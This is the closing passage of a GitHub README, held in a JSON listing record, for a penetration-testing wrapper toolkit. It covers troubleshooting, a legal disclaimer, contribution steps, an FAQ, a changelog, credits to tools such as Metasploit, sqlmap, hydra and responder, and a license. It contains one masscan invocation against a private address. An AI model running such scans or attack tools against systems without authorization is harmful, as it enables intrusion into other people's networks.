tools/**/*.sh\n```\n\n#### Issue: \"Command not found\" for tools\n\n```bash\n# Fix: Install missing tools\nsudo apt install -y \u003ctool-name\u003e\n\n# Or run setup again\nsudo ./ghost_setup.sh\n```\n\n#### Issue: Repository clone failures\n\n```bash\n# Fix: Check internet connection\nping github.com\n\n# Or manually clone\ngit clone https://github.com/joemunene-by/\u003crepo-name\u003e.git\n```\n\n#### Issue: Module not found errors\n\n```bash\n# Fix: Install Python dependencies\npip3 install -r requirements.txt --break-system-packages\n\n# Or for Node.js\nnpm install\n```\n\n#### Issue: masscan requires root\n\n```bash\n# Fix: Run with sudo\nsudo ./tools/network/ghost_masscan.sh -t 10.0.0.1\n```\n\n### Getting Help\n\n- 📧 Open an issue: [GitHub Issues](https://github.com/joemunene-by/ghost-toolkit-scripts/issues)\n- 💬 Check discussions: [GitHub Discussions](https://github.com/joemunene-by/ghost-toolkit-scripts/discussions)\n- 📖 Read documentation: [Wiki](https://github.com/joemunene-by/ghost-toolkit-scripts/wiki)\n\n---\n\n## ⚖️ Legal Disclaimer\n\n### Important Warning\n\n⚠️ **FOR AUTHORIZED SECURITY TESTING ONLY!**\n\nBy using Ghost Toolkit, you agree to the following:\n\n1. **Authorized Use Only** - Only use on systems you own or have explicit written permission to test. Unauthorized access is illegal and punishable under laws including but not limited to:\n   - Computer Fraud and Abuse Act (CFAA) - USA\n   - Computer Misuse Act (CMA) - UK\n   - GDPR - EU\n   - Local cyber laws in your jurisdiction\n\n2. **No Liability** - The authors assume no liability for any damages caused by the use of this toolkit.\n\n3. **Educational Purpose** - Tools are provided for legitimate security testing and educational purposes only.\n\n4. **Risk Acceptance** - You accept all risks associated with using these tools.\n\n### Best Practices\n\n- ✅ Always get written authorization before testing\n- ✅ Document all findings thoroughly\n- ✅ Follow responsible disclosure guidelines\n- ✅ Use on your own systems for learning\n- ✅ Test in controlled lab environments\n\n---\n\n## 🤝 Contributing\n\nWe welcome contributions! Here's how you can help:\n\n### Ways to Contribute\n\n1. **Report Bugs** - Open an issue with detailed steps to reproduce\n2. **Suggest Features** - Open an issue with your idea\n3. **Add New Tools** - Submit a PR with new wrapper scripts\n4. **Improve Documentation** - Fix typos, add examples\n5. **Share Feedback** - Let us know what you think\n\n### Adding New Tools\n\n```bash\n# 1. Create your tool script\n# Follow the pattern in tools/\u003ccategory\u003e/\n\n# 2. Add to launcher\n# Edit ghost_launcher.sh to include your tool\n\n# 3. Update README\n# Add documentation for your tool\n\n# 4. Submit PR\ngit checkout -b feature/my-new-tool\ngit add .\ngit commit -m \"Add: My new tool\"\ngit push origin feature/my-new-tool\n```\n\n### Code Style\n\n- Use consistent indentation (4 spaces)\n- Add comments for complex operations\n- Include help flags (-h, --help)\n- Handle errors gracefully\n\n---\n\n## ❓ FAQ\n\n### Q: Is this legal?\n\n**A:** Yes, when used for authorized security testing on systems you own or have permission to test. Always obtain written authorization before testing.\n\n### Q: Do I need Kali Linux?\n\n**A:** No, Ghost Toolkit works on any Linux distribution. However, it's optimized for Debian-based systems (Ubuntu, Kali, ParrotOS).\n\n### Q: Why do some tools require sudo?\n\n**A:** Certain network operations (raw sockets, port scanning, network monitoring) require elevated privileges for access to network interfaces.\n\n### Q: Can I use this on Windows?\n\n**A:** Ghost Toolkit is designed for Linux/macOS. For Windows, consider using WSL (Windows Subsystem for Linux) or a virtual machine.\n\n### Q: How do I update all tools?\n\n**A:** Run `./ghost_update.sh` to pull the latest versions of all tools and scripts.\n\n### Q: Are these tools detected by antivirus?\n\n**A:** Some exploitation tools may be flagged by antivirus. This is expected behavior - these tools can be used for both legitimate security testing and malicious purposes.\n\n### Q: Can I contribute code?\n\n**A:** Absolutely! See the Contributing section above.\n\n### Q: How do I report a vulnerability in this project?\n\n**A:** Please open a private security issue through GitHub's security advisories.\n\n---\n\n## 📝 Changelog\n\n### v3.0.0 (Current)\n- ✅ Added 21 new tools\n- ✅ Expanded to 60+ total tools\n- ✅ New Defense \u0026 Monitoring category\n- ✅ Enhanced launcher with 8 categories\n- ✅ Complete README overhaul\n\n### v2.0.0\n- ✅ Added categorized launcher\n- ✅ New tool categories\n- ✅ Updated ghost_setup.sh\n- ✅ ghost_update.sh added\n\n### v1.0.0\n- ✅ Initial release\n- ✅ 12 basic tools\n- ✅ Basic launcher\n\n---\n\n## 👏 Credits\n\n### Developers\n\n- **Joe Munene** (@joemunene-by) - Creator and maintainer\n\n### Open Source Projects\n\nThis toolkit leverages many open-source projects:\n\n| Tool | Creator | License |\n|------|---------|---------|\n| Nmap | Fyodor | GPL |\n| Metasploit | Rapid7 | BSD |\n| sqlmap | Miroslav Stampar | GPL |\n| nikto | CIRT.net | GPL |\n| hydra | van Hauser/THC | AGPL |\n| LinPEAS | carlospolop | GPL |\n| responder | SpiderLabs | GPL |\n\n### Inspiration\n\n- Kali Linux\n- Parrot Security OS\n- PenTesters Framework (PTF)\n- BlackArch\n\n---\n\n## 📄 License\n\nMIT License\n\nCopyright (c) 2024 Joe Munene (@joemunene-by)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n---\n\n## 🔗 Links\n\n- 📘 [GitHub Repository](https://github.com/joemunene-by/ghost-toolkit-scripts)\n- 👤 [Author Profile](https://github.com/joemunene-by)\n- 🐛 [Issue Tracker](https://github.com/joemunene-by/ghost-toolkit-scripts/issues)\n- 💬 [Discussions](https://github.com/joemunene-by/ghost-toolkit-scripts/discussions)\n\n---\n\n\u003cp align=\"center\"\u003e\n  Made with ❤️ by \u003ca href=\"https://github.com/joemunene-by\"\u003eJoe Munene\u003c/a\u003e\n  \n  ⭐ Star us on GitHub | 🐛 Report Issues | 📧 Contact\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://komarev.com/ghpvc/?username=ghost-toolkit-scripts\u0026label=Views\u0026color=green\" alt=\"Profile views\"\u003e\n\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoemunene-by%2Fghost-toolkit-scripts","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoemunene-by%2Fghost-toolkit-scripts","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoemunene-by%2Fghost-toolkit-scripts/lists"}